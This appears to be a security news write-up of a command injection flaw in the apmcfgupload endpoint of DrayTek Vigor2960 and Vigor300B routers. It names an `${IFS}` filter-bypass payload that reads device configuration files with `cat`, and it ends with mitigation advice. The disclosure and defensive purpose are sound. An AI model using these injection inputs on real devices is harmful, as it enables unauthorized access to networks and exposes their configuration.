The DrayTek Gateway devices, more specifically the Vigor2960 and Vigor300B models, are susceptible to a critical command injection vulnerability.
Exploitable via the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, attackers can inject arbitrary commands into the system by manipulating the session parameter within a crafted HTTP request.
The vulnerability impacts over 66,000 internet-connected devices, potentially allowing attackers to gain remote code execution, compromise the device, and potentially access sensitive network data.
DrayTek Vigor2960 and Vigor300B devices running software version 1.5.1.4 are vulnerable to a command injection vulnerability, which resides within the Web Management Interface, specifically in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint.
An attacker can exploit this flaw by injecting malicious commands into the HTTP request, which the device then executes with elevated privileges.
Successful exploitation could allow an attacker to gain unauthorized access to the device, execute arbitrary code, and potentially compromise the entire network.
The apmcfgupload endpoint suffers from a command injection vulnerability, which arises from insufficient input validation of the session parameter.
The Python script exploits a potential vulnerability by crafting a malformed HTTP request, which leverages a raw socket connection to bypass typical HTTP processing and directly transmit the request to the target device.
Within the `apmcfgupload` path, the request contains a command injection consisting of a hexadecimal encoded command known as `pwd`.
It then attempts to establish a connection, send the crafted request, and receive the server’s response. The script aims to execute the injected command on the target system by manipulating the HTTP request structure.
An attacker can exploit command injection vulnerabilities in applications to execute arbitrary commands on the underlying operating system, which is achieved by injecting malicious code into user inputs that are processed by the application.
In the first example, a straightforward injection of the `pwd` command is demonstrated, which reveals the directory that is currently being used for working.
The second example is more sophisticated, using `${IFS}` (Input Field Separator) to bypass potential filters and execute the `cat /etc/persistence/config/device_in*` command, which could expose sensitive system configuration files.
To enhance security, NetSecFish recommends implementing strict input validation and sanitization for all CGI script parameters, which will prevent malicious inputs from exploiting vulnerabilities in the scripts.
Limiting access to the web management interface to trusted IP addresses will significantly reduce the attack surface by preventing unauthorized access attempts from untrusted sources.